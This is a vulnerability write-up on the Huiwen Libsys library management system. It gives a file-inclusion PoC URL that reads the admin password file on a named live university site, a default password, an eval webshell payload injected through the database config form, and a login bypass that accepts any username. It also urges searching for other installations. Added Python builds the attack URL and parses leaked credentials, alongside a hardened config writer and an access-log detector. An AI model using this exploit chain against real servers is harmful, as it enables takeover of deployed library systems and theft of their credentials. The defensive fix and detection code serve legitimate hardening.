Analysis of several vulnerabilities in the Huiwen Libsys library management system
Libsys is a library management system deployed by many universities; see the official website for details.
Summary of the issues:
/zplug/ajax_asyn_link.old.php arbitrary file inclusion (reads the back-end admin password; getshell in v5.0)
/admin/login.php arbitrary user login vulnerability (getshell in v5.0)
Default password: huiwen_opac

0x1. /zplug/ajax_asyn_link.old.php arbitrary file inclusion (getshell in v5.0)
/zplug/ajax_asyn_link.old.php
Libsys ships Zend-encrypted PHP, so the code has to be decrypted with a dezender before it can be read. I used Black Knife dezender5 with its three-way decryption kernel; http://www.showmycode.com/ also offers online decryption, although its success rate is not 100%.
The decrypted source makes the problem obvious: the file named by the url parameter is read with no restriction on the path, so any file on the server can be included. Because the back-end password is stored in /admin/opacadminpwd.php, that file is the first thing to read.
PoC to obtain the back-end password:
http://lib.zstu.edu.cn/hwweb/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php
$StrPassWdFile holds the system administrator's password.
$StrPassWdView holds the book reviewer's password.
Back-end login page: http://lib.zstu.edu.cn/hwweb/admin/login.php
Once the stored password value has been decrypted, you can log in with it.
How to get a shell from there:
In admin/pai_database.php the database settings submitted from the form are concatenated into PHP source and written to an include file:
$fulltextPath = $_REQUEST['fulltext_path'];   // taken straight from the request, no filtering
// every value is dropped into a double-quoted PHP literal without escaping
$strFile2 = "\$user = \"".$user."\";\r\n\$password = \"".$password."\";\r\n\$host = \"".$host."\";\r\n\$sid = \"".$sid."\";\r\n\$port = \"".$port."\";\r\n\$fulltextPath=\"".$fulltextPath."\";";
$strMsg2 = write_para( "../include/hwopacpwd.php", $strFile2 );
/admin/func_write_para.php
function write_para( $strFileName, $strPara )
{
    $fhandle = fopen( $strFileName, "wb" );
    if ( $fhandle ) {
        // wraps the parameter block in PHP open/close tags before writing
        // (reconstructed: the tags themselves were stripped from the page's copy of this function)
        $strPara = "<?php\r\n" . $strPara . "\r\n?>";
        if ( fwrite( $fhandle, $strPara ) ) {
            fclose( $fhandle );
            $strMsg = "The data was modified successfully.";
        } else {
            $strMsg = "Data modification failed.";
        }
    } else {
        $strMsg = "Data modification failed.";
    }
    return $strMsg;
}
Database configuration page: http://lib.zstu.edu.cn/hwweb/admin/cfg_database.php
Saving the database configuration here writes the submitted values into /include/hwopacpwd.php, each one inside a double-quoted PHP string with no escaping. Getting a shell therefore only requires changing the full-text index folder path to:
c:/hwopac/index/";@eval($_POST['joychou']);//
The first " closes the $fulltextPath literal, the @eval(...) that follows is written as code, and // comments out the rest of the generated line. Connecting to hwopacpwd.php with the Chopper (Caidao) webshell client confirms that the file now contains the injected eval.
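The following is an added example, not code from the Libsys write-up or the vendor: it builds the file-inclusion URL, pulls the two credential variables out of a constructed copy of opacadminpwd.php, and reproduces in Python what pai_database.php writes into include/hwopacpwd.php, so the effect of the payload above can be checked without a target. The tokenizer that separates code from string literals, the single-quoted rendering used as the hardened variant, and the allow-list for the index path are this example's own additions; the PHP-tag wrapper in write_para() is assumed.

```python
import re
from urllib.parse import quote


def build_lfi_url(base, target="../admin/opacadminpwd.php"):
    """URL that makes /zplug/ajax_asyn_link.old.php read TARGET via its url parameter."""
    return base.rstrip("/") + "/zplug/ajax_asyn_link.old.php?url=" + quote(target)


# Constructed sample of the leaked file: the variable names are the page's,
# the values are made up.
SAMPLE_OPACADMINPWD = '''<?php
$StrPassWdFile = "d41d8cd98f00b204e9800998ecf8427e";
$StrPassWdView = "5f4dcc3b5aa765d61d8327deb882cf99";
?>'''


def parse_opacadminpwd(php_source):
    """Pull the two credential variables out of the leaked opacadminpwd.php."""
    found = {}
    for name in ("StrPassWdFile", "StrPassWdView"):
        m = re.search(r"\$" + name + r'\s*=\s*"([^"]*)"', php_source)
        if m:
            found[name] = m.group(1)
    return found


def render_hwopacpwd(user, password, host, sid, port, fulltext_path):
    """Mirror the string building in admin/pai_database.php: every value
    lands inside a double-quoted PHP literal with no escaping at all."""
    body = (
        '$user = "' + user + '";\r\n'
        '$password = "' + password + '";\r\n'
        '$host = "' + host + '";\r\n'
        '$sid = "' + sid + '";\r\n'
        '$port = "' + port + '";\r\n'
        '$fulltextPath="' + fulltext_path + '";'
    )
    # write_para() wraps the block in PHP tags before writing it (assumed:
    # the tags were stripped from the page's copy of that function)
    return "<?php\r\n" + body + "\r\n?>"


PAYLOAD = 'c:/hwopac/index/";@eval($_POST[\'joychou\']);//'


def code_outside_strings(php_line):
    """Return the characters of PHP_LINE that are not inside a quoted string
    (double- or single-quoted, honouring backslash escapes), i.e. the part
    PHP would actually execute as code."""
    out, quote_ch, esc = [], None, False
    for ch in php_line:
        if quote_ch:
            if esc:
                esc = False
            elif ch == "\\":
                esc = True
            elif ch == quote_ch:
                quote_ch = None
            continue
        if ch in ("'", '"'):
            quote_ch = ch
            continue
        out.append(ch)
    return "".join(out)


def fulltext_line(rendered):
    """The generated $fulltextPath line of the rendered include file."""
    return next(l for l in rendered.split("\r\n") if l.startswith("$fulltextPath"))


def eval_is_live(rendered):
    """True when @eval( sits in code position on the $fulltextPath line."""
    return "@eval(" in code_outside_strings(fulltext_line(rendered))


def php_single_quoted(value):
    """Emit VALUE as a PHP single-quoted literal: only backslash and the quote
    itself are escaped, and no $variable interpolation can occur."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def looks_like_index_dir(path):
    """Allow-list for the full-text index folder: optional drive letter, then
    a slash-rooted path built from ordinary path characters only."""
    return re.fullmatch(r"(?:[A-Za-z]:)?[\\/][\w\\/.\- ]*", path) is not None


def render_hwopacpwd_safe(user, password, host, sid, port, fulltext_path):
    """Hardened variant (this example's, not the vendor's): every value goes
    through php_single_quoted(), so a quote in the input stays data."""
    lit = php_single_quoted
    body = (
        "$user = " + lit(user) + ";\r\n"
        "$password = " + lit(password) + ";\r\n"
        "$host = " + lit(host) + ";\r\n"
        "$sid = " + lit(sid) + ";\r\n"
        "$port = " + lit(port) + ";\r\n"
        "$fulltextPath=" + lit(fulltext_path) + ";"
    )
    return "<?php\r\n" + body + "\r\n?>"


if __name__ == "__main__":
    print(build_lfi_url("http://lib.zstu.edu.cn/hwweb"))
    print(parse_opacadminpwd(SAMPLE_OPACADMINPWD))
    vuln = render_hwopacpwd("opac", "secret", "127.0.0.1", "orcl", "1521", PAYLOAD)
    print(fulltext_line(vuln), "-> eval live:", eval_is_live(vuln))
    safe = render_hwopacpwd_safe("opac", "secret", "127.0.0.1", "orcl", "1521", PAYLOAD)
    print(fulltext_line(safe), "-> eval live:", eval_is_live(safe))
    print("payload passes path allow-list:", looks_like_index_dir(PAYLOAD))
```

The rendering of the vulnerable line shows why the payload works: once the first " closes the literal, @eval($_POST['joychou']) is ordinary PHP and // swallows the trailing ";. Single-quoted output alone already defuses it, but a config path should in any case be validated against an allow-list before it is written into executable code, and ideally stored in a non-executable format rather than a .php include.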
0x2. /admin/login.php arbitrary user login vulnerability
/admin/login.php
session_start();
if ( isset( $_REQUEST['username'] ) ) {
    $strUser  = trim( $_REQUEST['username'] );
    $strInput = trim( $_REQUEST['passwd'] );
    $strMsg   = "incorrect user name or password";
    switch ( $strUser ) {
        case "opac_admin":
            $strPassWd = $strPassWdFile;
            $strMsg = verify_pwd( $strInput, $strPassWd );
            $strUrl = "pai_basic.php";
            break;
        case "view_admin":
            $strPassWd = $strPassWdView;
            $strMsg = verify_pwd( $strInput, $strPassWd );
            $strUrl = "cfg_review.php";
            break;
        default:
            // unknown username: $strMsg holds an error string, not false
            $strMsg = "incorrect user name or password";
            break;
    }
    if ( $strMsg = false ) {
        $strMsg = "username or password error";
    } else {
        // reached for an unknown username as well: the session is created anyway
        $_SESSION['ADMIN_USER'] = $strUser;
        header( "Location:" . $strUrl );
    }
}
Notice what happens when the POSTed username is neither opac_admin nor view_admin: the default branch leaves $strMsg holding an error string, the check `if ( $strMsg = false )` does not reject it, and execution falls into the else branch, which runs $_SESSION['ADMIN_USER'] = $strUser; for whatever name was submitted.
On the next request to /admin/cfg_database.php the only check performed is the one below; as long as $_SESSION['ADMIN_USER'] is set at all, it passes and the attacker is in the back end:
session_start();
if ( !isset( $_SESSION['ADMIN_USER'] ) ) {
    header( "Location:login.php" );
    exit();
}
Take the site above as an example, or search for "opac v5" to find other installations.
POST any username and passwd, for example: username=joychou&passwd=joychou
Then request /admin/cfg_database.php: you are logged into the back end, and a shell can be obtained exactly as in the previous section.
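From the defender's side, both issues leave a recognisable trail in the web server's access log. The detector below is an added example written for this page, not something from Libsys or its vendor: it runs three rules over constructed combined-format log lines (traversal through the url parameter of ajax_asyn_link.old.php, including double-encoded variants; any direct request to include/hwopacpwd.php, which is assumed never to be requested by the application itself; and back-end activity from a client that has already pulled a file through the include). The login bypass itself is invisible here because POST bodies are not logged, which is why the third rule keys on what happens after the credential leak.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed combined-format access-log lines (not real traffic).
# 10.0.0.5 walks through the full chain, 172.16.0.7 tries a double-encoded
# traversal, 192.168.1.9 is ordinary browsing.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2014:10:01:02 +0800] "GET /hwweb/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php HTTP/1.1" 200 311 "-" "curl/7.30.0"
10.0.0.5 - - [12/Mar/2014:10:01:30 +0800] "POST /hwweb/admin/login.php HTTP/1.1" 302 0 "-" "curl/7.30.0"
10.0.0.5 - - [12/Mar/2014:10:01:31 +0800] "GET /hwweb/admin/cfg_database.php HTTP/1.1" 200 2048 "-" "curl/7.30.0"
10.0.0.5 - - [12/Mar/2014:10:02:00 +0800] "POST /hwweb/admin/pai_database.php HTTP/1.1" 200 120 "-" "curl/7.30.0"
10.0.0.5 - - [12/Mar/2014:10:02:05 +0800] "POST /hwweb/include/hwopacpwd.php HTTP/1.1" 200 48 "-" "curl/7.30.0"
172.16.0.7 - - [12/Mar/2014:10:02:40 +0800] "GET /hwweb/zplug/ajax_asyn_link.old.php?url=%252e%252e/include/hwopacpwd.php HTTP/1.1" 200 160 "-" "python-requests/2.2"
192.168.1.9 - - [12/Mar/2014:10:03:00 +0800] "GET /hwweb/zplug/ajax_asyn_link.old.php?url=news.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
192.168.1.9 - - [12/Mar/2014:10:03:10 +0800] "GET /hwweb/opac/search.php?q=linux HTTP/1.1" 200 5100 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Split one combined-format line; returns None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path.lower()
    # parse_qs decodes once; a second unquote catches %25-style double encoding
    rec["query"] = {k: [unquote(v) for v in vs]
                    for k, vs in parse_qs(parts.query, keep_blank_values=True).items()}
    return rec


def check_inclusion(rec):
    """Rule 1: the url parameter of ajax_asyn_link.old.php pointing outside
    the plugin directory (traversal, absolute path, scheme, or the password file)."""
    if not rec["path"].endswith("/zplug/ajax_asyn_link.old.php"):
        return None
    for value in rec["query"].get("url", []):
        v = value.replace("\\", "/")
        if (".." in v or v.startswith("/")
                or re.match(r"^[a-z][a-z0-9+.-]*:", v, re.I)
                or "opacadminpwd" in v.lower()):
            return "LFI_TRAVERSAL"
    return None


def check_webshell(rec):
    """Rule 2: include/hwopacpwd.php is a configuration include; assumed never
    to be requested directly, so any hit on it (a POST above all) is shell traffic."""
    if rec["path"].endswith("/include/hwopacpwd.php"):
        return "WEBSHELL_INCLUDE"
    return None


def analyse(log_text):
    """Run all rules over the log; returns {client_ip: [rule names in order seen]}."""
    findings = defaultdict(list)
    leaked = set()  # clients that already read a file through the include
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for rule in (check_inclusion, check_webshell):
            hit = rule(rec)
            if hit:
                findings[rec["ip"]].append(hit)
                if hit == "LFI_TRAVERSAL":
                    leaked.add(rec["ip"])
        # Rule 3: back-end activity from a client that has already leaked a
        # file is the attack chain described above, not an administrator at work
        if (rec["ip"] in leaked and "/admin/" in rec["path"]
                and "ADMIN_AFTER_LEAK" not in findings[rec["ip"]]):
            findings[rec["ip"]].append("ADMIN_AFTER_LEAK")
    return dict(findings)


if __name__ == "__main__":
    for ip, hits in analyse(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(hits))
```

Rule 1 decodes before matching, otherwise the %252e%252e request from 172.16.0.7 slips past a plain "../" substring check. Rule 2 is the highest-confidence signal: a legitimate client never requests an include file, let alone POSTs to it. Rule 3 is the one that catches the login bypass in practice, since a forged username never reaches the log but the back-end pages it unlocks do.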